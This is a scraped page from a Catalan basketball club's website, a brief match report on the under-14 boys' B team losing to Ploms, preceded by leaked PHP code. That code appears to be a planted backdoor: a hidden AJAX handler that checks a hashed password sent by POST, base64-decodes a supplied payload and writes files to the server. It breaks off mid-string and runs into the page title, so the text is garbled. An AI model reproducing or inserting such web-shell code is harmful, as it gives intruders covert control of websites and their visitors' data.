function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí B no pot contra el joc interior del Ploms - Tgn Bàsquet Club -

L’infantil masculí B no pot contra el joc interior del Ploms

Updated: octubre 21, 2013
Partit molt complicat pel TGN Bàsquet que mai va poder aturar ni superar el jugador rival Serrano que es va fer l’amo de les dues zones. La poca agressivitat defensiva dels locals durant la primera meitat de partit va permetre els visitants agafar un gran avantatge en el marcador. Després del descans, la millora defensiva del TGN Bàsquet i els minuts de descans de que va gaudir el visitant Serrano van permetre els locals retallar les distàncies però sense cap opció a victòria.